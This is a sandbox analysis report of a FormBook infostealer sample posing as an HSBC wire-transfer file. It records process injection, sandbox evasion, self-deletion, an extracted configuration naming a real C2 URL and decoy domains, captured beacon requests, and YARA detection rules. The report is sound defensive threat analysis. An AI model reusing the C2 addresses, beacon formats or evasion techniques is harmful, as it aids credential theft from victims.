Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report HSBC ... Wire Transfer Copy.exe

Overview

General Information

Sample Name:HSBC ... Wire Transfer Copy.exe
Analysis ID:528773
MD5:99b154970d15748d1df9025f675ecc76
SHA1:75503611daf18643a401c2020ae9e045111b7f1f
SHA256:13af03cd2db9c68bc397fd81f101287df005f27bc806737ffad390324a068d4c
Tags:exeFormbookHSBC
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Modifies the prolog of user mode functions (user mode inline hooks)
Self deletion via cmd delete
.NET source code contains potential unpacker
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses ipconfig to lookup or modify the Windows network settings
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • HSBC ... Wire Transfer Copy.exe (PID: 6892 cmdline: "C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe" MD5: 99B154970D15748D1DF9025F675ECC76)
    • HSBC ... Wire Transfer Copy.exe (PID: 7164 cmdline: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe MD5: 99B154970D15748D1DF9025F675ECC76)
      • explorer.exe (PID: 3352 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • ipconfig.exe (PID: 6536 cmdline: C:\Windows\SysWOW64\ipconfig.exe MD5: B0C7423D02A007461C850CD0DFE09318)
          • cmd.exe (PID: 6672 cmdline: /c del "C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.atlantiscompania.com/m4n8/"], "decoy": ["loganvineyard.com", "seanna-charters.com", "ironbandfitness.com", "centuriesandsleuthsreviews.com", "saminicky2022.com", "oscarlorenzo.online", "donaldlittlelaw.com", "internetbook.net", "dailyhealthyfood.com", "kostarelosdair.com", "baodingtangyang.com", "cumberlndfarms.com", "dylanmellor.xyz", "investwithelsa.com", "dermaaesthetika.com", "shoelife864.com", "nightcosex.biz", "greauxbooks.com", "artwithnumber.com", "hyggestudio.store", "vektor-pro.com", "bookextraevents.com", "poweredsky.store", "carver150.com", "greenfleetshippingco.com", "raise-ryokwpl.xyz", "lobbiru.com", "tilcep.xyz", "frist-universe.com", "thehumanityleague.com", "zz4321.com", "rightpowereletricalservices.com", "alainasdesigns.com", "getcardanocoin.com", "wattnow.biz", "nitromaxfmx.com", "rty161578.top", "danielthan.com", "devjmccormick.com", "clearwaterwaverunners.com", "onlineames.com", "pureproducts.xyz", "yoothdirect.info", "tryprovo.com", "mkuu88888.xyz", "fibers2you.com", "urdnauha.xyz", "andfme.com", "shopkoman.com", "civico46bcn.com", "top-online-fashion-24.com", "lakshimechatronicssystems.com", "cortezphoto.com", "samallondemolitonyorkshire.com", "uang.exchange", "gonderipaylasim.net", "piramsgprodiet.store", "parasmountplus.com", "sifangav.net", "gramaltinrafineri.com", "kvb5676.com", "atomhome.xyz", "catproductreviews.com", "frenchieaday.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000000.287427300.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000006.00000000.287427300.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000006.00000000.287427300.0000000000400000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18849:$sqlite3step: 68 34 1C 7B E1
    • 0x1895c:$sqlite3step: 68 34 1C 7B E1
    • 0x18878:$sqlite3text: 68 38 2A 90 C5
    • 0x1899d:$sqlite3text: 68 38 2A 90 C5
    • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
    00000010.00000002.547820066.0000000003380000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000010.00000002.547820066.0000000003380000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 31 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      6.2.HSBC ... Wire Transfer Copy.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        6.2.HSBC ... Wire Transfer Copy.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1bb2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        6.2.HSBC ... Wire Transfer Copy.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x17a49:$sqlite3step: 68 34 1C 7B E1
        • 0x17b5c:$sqlite3step: 68 34 1C 7B E1
        • 0x17a78:$sqlite3text: 68 38 2A 90 C5
        • 0x17b9d:$sqlite3text: 68 38 2A 90 C5
        • 0x17a8b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17bb3:$sqlite3blob: 68 53 D8 7F 8C
        6.0.HSBC ... Wire Transfer Copy.exe.400000.8.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          6.0.HSBC ... Wire Transfer Copy.exe.400000.8.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1bb2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 18 entries

          Sigma Overview

          No Sigma rule has matched

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000006.00000000.287427300.0000000000400000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.atlantiscompania.com/m4n8/"], "decoy": ["loganvineyard.com", "seanna-charters.com", "ironbandfitness.com", "centuriesandsleuthsreviews.com", "saminicky2022.com", "oscarlorenzo.online", "donaldlittlelaw.com", "internetbook.net", "dailyhealthyfood.com", "kostarelosdair.com", "baodingtangyang.com", "cumberlndfarms.com", "dylanmellor.xyz", "investwithelsa.com", "dermaaesthetika.com", "shoelife864.com", "nightcosex.biz", "greauxbooks.com", "artwithnumber.com", "hyggestudio.store", "vektor-pro.com", "bookextraevents.com", "poweredsky.store", "carver150.com", "greenfleetshippingco.com", "raise-ryokwpl.xyz", "lobbiru.com", "tilcep.xyz", "frist-universe.com", "thehumanityleague.com", "zz4321.com", "rightpowereletricalservices.com", "alainasdesigns.com", "getcardanocoin.com", "wattnow.biz", "nitromaxfmx.com", "rty161578.top", "danielthan.com", "devjmccormick.com", "clearwaterwaverunners.com", "onlineames.com", "pureproducts.xyz", "yoothdirect.info", "tryprovo.com", "mkuu88888.xyz", "fibers2you.com", "urdnauha.xyz", "andfme.com", "shopkoman.com", "civico46bcn.com", "top-online-fashion-24.com", "lakshimechatronicssystems.com", "cortezphoto.com", "samallondemolitonyorkshire.com", "uang.exchange", "gonderipaylasim.net", "piramsgprodiet.store", "parasmountplus.com", "sifangav.net", "gramaltinrafineri.com", "kvb5676.com", "atomhome.xyz", "catproductreviews.com", "frenchieaday.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: HSBC ... Wire Transfer Copy.exeVirustotal: Detection: 16%Perma Link
          Source: HSBC ... Wire Transfer Copy.exeReversingLabs: Detection: 40%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 6.2.HSBC ... Wire Transfer Copy.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.HSBC ... Wire Transfer Copy.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000006.00000000.287427300.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.547820066.0000000003380000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.346806023.0000000001930000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.547165223.0000000002C60000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.345755031.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.346832554.0000000001960000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.290604348.0000000003AF1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000000.322367188.000000000FC1F000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.287940636.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.547580773.0000000002DD0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.290259549.00000000038AD000.00000004.00000001.sdmp, type: MEMORY
          Source: 6.2.HSBC ... Wire Transfer Copy.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.8.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.6.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: HSBC ... Wire Transfer Copy.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: HSBC ... Wire Transfer Copy.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: ipconfig.pdb source: HSBC ... Wire Transfer Copy.exe, 00000006.00000002.346858842.0000000001990000.00000040.00020000.sdmp
          Source: Binary string: ipconfig.pdbGCTL source: HSBC ... Wire Transfer Copy.exe, 00000006.00000002.346858842.0000000001990000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: HSBC ... Wire Transfer Copy.exe, 00000006.00000002.346567819.000000000171F000.00000040.00000001.sdmp, HSBC ... Wire Transfer Copy.exe, 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, ipconfig.exe, 00000010.00000002.548146108.0000000003620000.00000040.00000001.sdmp, ipconfig.exe, 00000010.00000002.549823291.000000000373F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: HSBC ... Wire Transfer Copy.exe, HSBC ... Wire Transfer Copy.exe, 00000006.00000002.346567819.000000000171F000.00000040.00000001.sdmp, HSBC ... Wire Transfer Copy.exe, 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, ipconfig.exe, ipconfig.exe, 00000010.00000002.548146108.0000000003620000.00000040.00000001.sdmp, ipconfig.exe, 00000010.00000002.549823291.000000000373F000.00000040.00000001.sdmp
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 4x nop then pop edi6_2_0040E477
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4x nop then pop edi16_2_02C6E477

          Networking:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 172.217.168.83 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.gramaltinrafineri.com
          Source: C:\Windows\explorer.exeDomain query: www.catproductreviews.com
          Source: C:\Windows\explorer.exeDomain query: www.piramsgprodiet.store
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.atlantiscompania.com/m4n8/
          Source: global trafficHTTP traffic detected: GET /m4n8/?l0G=-Zrd9J1pqHLdHPo&5jblCF=tUrd37IHNwUNrKy1BA5QR6EUYG6BNHyAaYYkpUFqoPlzKT8wvvxP2/AQv7fSiFC9KSL+ HTTP/1.1Host: www.piramsgprodiet.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /m4n8/?5jblCF=6FC/YAdxArGDbOG0ZU8ranLB3olQ8/HIU17UMwKJ54PfoS0z6/xA4+VoDBKhLnDEQ6+k&l0G=-Zrd9J1pqHLdHPo HTTP/1.1Host: www.gramaltinrafineri.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /m4n8/?l0G=-Zrd9J1pqHLdHPo&5jblCF=fqwcloTwW+H6Usea82LuZckhsM6vXxH+7LRp9WPFBQLwjEJmVheIZ7PCXY+dS9vifeb6 HTTP/1.1Host: www.catproductreviews.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 25 Nov 2021 17:58:23 GMTContent-Type: text/htmlContent-Length: 275ETag: "61973ffe-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 25 Nov 2021 17:58:43 GMTContent-Type: text/htmlContent-Length: 275ETag: "61973ffe-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
          Source: HSBC ... Wire Transfer Copy.exe, 00000000.00000002.289914483.00000000028A1000.00000004.00000001.sdmp, HSBC ... Wire Transfer Copy.exe, 00000000.00000002.290051006.000000000296B000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: ipconfig.exe, 00000010.00000002.551598331.000000000403F000.00000004.00020000.sdmpString found in binary or memory: https://www.piramsgprodiet.store/m4n8/?l0G=-Zrd9J1pqHLdHPo&amp;5jblCF=tUrd37IHNwUNrKy1BA5QR6EUYG6BNH
          Source: unknownDNS traffic detected: queries for: www.piramsgprodiet.store
          Source: global trafficHTTP traffic detected: GET /m4n8/?l0G=-Zrd9J1pqHLdHPo&5jblCF=tUrd37IHNwUNrKy1BA5QR6EUYG6BNHyAaYYkpUFqoPlzKT8wvvxP2/AQv7fSiFC9KSL+ HTTP/1.1Host: www.piramsgprodiet.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /m4n8/?5jblCF=6FC/YAdxArGDbOG0ZU8ranLB3olQ8/HIU17UMwKJ54PfoS0z6/xA4+VoDBKhLnDEQ6+k&l0G=-Zrd9J1pqHLdHPo HTTP/1.1Host: www.gramaltinrafineri.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /m4n8/?l0G=-Zrd9J1pqHLdHPo&5jblCF=fqwcloTwW+H6Usea82LuZckhsM6vXxH+7LRp9WPFBQLwjEJmVheIZ7PCXY+dS9vifeb6 HTTP/1.1Host: www.catproductreviews.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 6.2.HSBC ... Wire Transfer Copy.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.HSBC ... Wire Transfer Copy.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000006.00000000.287427300.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.547820066.0000000003380000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.346806023.0000000001930000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.547165223.0000000002C60000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.345755031.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.346832554.0000000001960000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.290604348.0000000003AF1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000000.322367188.000000000FC1F000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.287940636.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.547580773.0000000002DD0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.290259549.00000000038AD000.00000004.00000001.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 6.2.HSBC ... Wire Transfer Copy.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.HSBC ... Wire Transfer Copy.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.2.HSBC ... Wire Transfer Copy.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.HSBC ... Wire Transfer Copy.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.287427300.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.287427300.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000010.00000002.547820066.0000000003380000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000010.00000002.547820066.0000000003380000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.346806023.0000000001930000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.346806023.0000000001930000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000010.00000002.547165223.0000000002C60000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000010.00000002.547165223.0000000002C60000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.345755031.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.345755031.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
